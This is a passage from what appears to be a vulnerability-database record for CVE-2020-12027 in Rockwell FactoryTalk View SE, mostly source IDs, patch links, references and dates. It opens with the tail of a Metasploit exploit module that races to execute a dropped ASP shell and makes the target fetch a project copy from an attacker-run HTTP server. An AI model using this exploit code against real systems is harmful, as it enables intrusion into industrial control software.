\u0027\u0027).strip\n    print_good(\"#{peer} - Got a path to drop our shell: #{shell_path}\")\n\n    # Start http server for project copy callback\n    http_service = \u0027http://\u0027 + datastore[\u0027SRVHOST\u0027] + \u0027:\u0027 + datastore[\u0027SRVPORT\u0027].to_s\n    print_status(\"#{peer} - Starting up our web service on #{http_service} ...\")\n\n    start_service({ \u0027Uri\u0027 =\u003e {\n      \u0027Proc\u0027 =\u003e proc do |cli, req|\n        on_request_uri(cli, req)\n      end,\n      # This path has to be capitalized as \"RSViewSE\" or else the exploit will fail!\n      \u0027Path\u0027 =\u003e \u0027/RSViewSE/\u0027\n    } })\n\n    # Race Condition\n    # This is the racer thread. It will continuously access our asp file until it gets executed\n    print_status(\"#{peer} - Starting racer thread, let\u0027s win this race condition!\")\n    @shelly = \"#{rand_text_alpha(5..10)}.asp\"\n    racer = Thread.new do\n      loop do\n        res = send_to_factory(\"/#{@shelly}\")\n        if res.code == 200\n          print_good(\"#{peer} - We\u0027ve won the race condition, shell incoming!\")\n          break\n        end\n      end\n    end\n\n    # Project Copy Request: target will connect to us to obtain project information. \n    print_status(\"#{peer} - Initiating project copy request...\")\n    url = \"/hmi_isapi.dll?StartRemoteProjectCopy\u0026#{@proj_name}\u0026#{rand_text_alpha(5..13)}\u0026#{datastore[\u0027SRVHOST\u0027]}:#{datastore[\u0027SRVPORT\u0027]}\u00261\"\n    res = send_to_factory(url)\n\n    # wait up to datastore[\u0027SLEEP_RACER\u0027] seconds for the racer thread to finish\n    count = 0\n    while count \u003c datastore[\u0027SLEEP_RACER\u0027]\n      break if racer.status == false\n\n      sleep(1)\n      count += 1\n    end\n    racer.exit\n  end\nend\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-12027"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008252"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-732"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-728"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-727"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38419"
      },
      {
        "db": "VULHUB",
        "id": "VHN-164664"
      },
      {
        "db": "PACKETSTORM",
        "id": "160156"
      }
    ],
    "trust": 4.23
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-164664",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-164664"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-12027",
        "trust": 5.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-20-170-05",
        "trust": 3.1
      },
      {
        "db": "PACKETSTORM",
        "id": "160156",
        "trust": 1.8
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-732",
        "trust": 1.3
      },
      {
        "db": "JVN",
        "id": "JVNVU97172119",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008252",
        "trust": 0.8
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-10291",
        "trust": 0.7
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-10282",
        "trust": 0.7
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-728",
        "trust": 0.7
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-10281",
        "trust": 0.7
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-727",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38419",
        "trust": 0.7
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1216",
        "trust": 0.7
      },
      {
        "db": "NSFOCUS",
        "id": "47318",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-164664",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-20-732"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-728"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-727"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38419"
      },
      {
        "db": "VULHUB",
        "id": "VHN-164664"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008252"
      },
      {
        "db": "PACKETSTORM",
        "id": "160156"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12027"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1216"
      }
    ]
  },
  "id": "VAR-202007-0193",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-38419"
      },
      {
        "db": "VULHUB",
        "id": "VHN-164664"
      }
    ],
    "trust": 1.3777777699999998
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-38419"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:49:38.628000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Rockwell Automation has issued an update to correct this vulnerability.",
        "trust": 2.1,
        "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://www.rockwellautomation.com/en-us.html"
      },
      {
        "title": "Patch for Rockwell Automation FactoryTalk View SE Information Disclosure Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/225339"
      },
      {
        "title": "Rockwell Automation FactoryTalk View SE Repair measures for information disclosure vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=121979"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-20-732"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-728"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-727"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38419"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008252"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1216"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-200",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-164664"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008252"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12027"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.8,
        "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
      },
      {
        "trust": 2.5,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
      },
      {
        "trust": 2.3,
        "url": "http://packetstormsecurity.com/files/160156/rockwell-factorytalk-view-se-scada-unauthenticated-remote-code-execution.html"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12027"
      },
      {
        "trust": 1.2,
        "url": "https://www.us-cert.gov/ics/advisories/icsa-20-170-05"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12027"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu97172119/index.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.zerodayinitiative.com/advisories/zdi-20-732/"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/47318"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12029"
      },
      {
        "trust": 0.1,
        "url": "https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/pedrib/poc/blob/master/advisories/pwn2own/miami_2020/replicant/replicant.md\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://metasploit.com/download"
      },
      {
        "trust": 0.1,
        "url": "http://\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rdomanski/exploits_and_advisories/tree/master/advisories/pwn2own/miami2020/replicant.md\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12028"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-20-732"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-728"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-727"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38419"
      },
      {
        "db": "VULHUB",
        "id": "VHN-164664"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008252"
      },
      {
        "db": "PACKETSTORM",
        "id": "160156"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12027"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1216"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "ZDI",
        "id": "ZDI-20-732"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-728"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-727"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38419"
      },
      {
        "db": "VULHUB",
        "id": "VHN-164664"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008252"
      },
      {
        "db": "PACKETSTORM",
        "id": "160156"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12027"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1216"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-06-22T00:00:00",
        "db": "ZDI",
        "id": "ZDI-20-732"
      },
      {
        "date": "2020-06-22T00:00:00",
        "db": "ZDI",
        "id": "ZDI-20-728"
      },
      {
        "date": "2020-06-22T00:00:00",
        "db": "ZDI",
        "id": "ZDI-20-727"
      },
      {
        "date": "2020-07-13T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-38419"
      },
      {
        "date": "2020-07-20T00:00:00",
        "db": "VULHUB",
        "id": "VHN-164664"
      },
      {
        "date": "2020-09-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-008252"
      },
      {
        "date": "2020-11-20T15:46:41",
        "db": "PACKETSTORM",
        "id": "160156"
      },
      {
        "date": "2020-07-20T16:15:12.087000",
        "db": "NVD",
        "id": "CVE-2020-12027"
      },
      {
        "date": "2020-06-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202006-1216"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-06-22T00:00:00",
        "db": "ZDI",
        "id": "ZDI-20-732"
      },
      {
        "date": "2021-06-29T00:00:00",
        "db": "ZDI",
        "id": "ZDI-20-728"
      },
      {
        "date": "2021-06-29T00:00:00",
        "db": "ZDI",
        "id": "ZDI-20-727"
      },
      {
        "date": "2020-07-13T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-38419"
      },
      {
        "date": "2021-09-23T00:00:00",
        "db": "VULHUB",
        "id": "VHN-164664"
      },
      {
        "date": "2020-09-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-008252"
      },
      {
        "date": "2021-09-23T13:38:44.667000",
        "db": "NVD",
        "id": "CVE-2020-12027"
      },
      {
        "date": "2021-09-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202006-1216"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "160156"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1216"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Rockwell Automation FactoryTalk View SE Information Disclosure Vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-38419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1216"
      }
    ],
    "trust": 1.2
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1216"
      }
    ],
    "trust": 0.6
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2020-12027 (GCVE-0-2020-12027)

FKIE_CVE-2020-12027

ICSA-20-170-05

GSD-2020-12027

GHSA-6P27-P48F-VH67

CNVD-2020-38419

VAR-202007-0193

This module requires Metasploit: https://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

Tags

Sightings

Nomenclature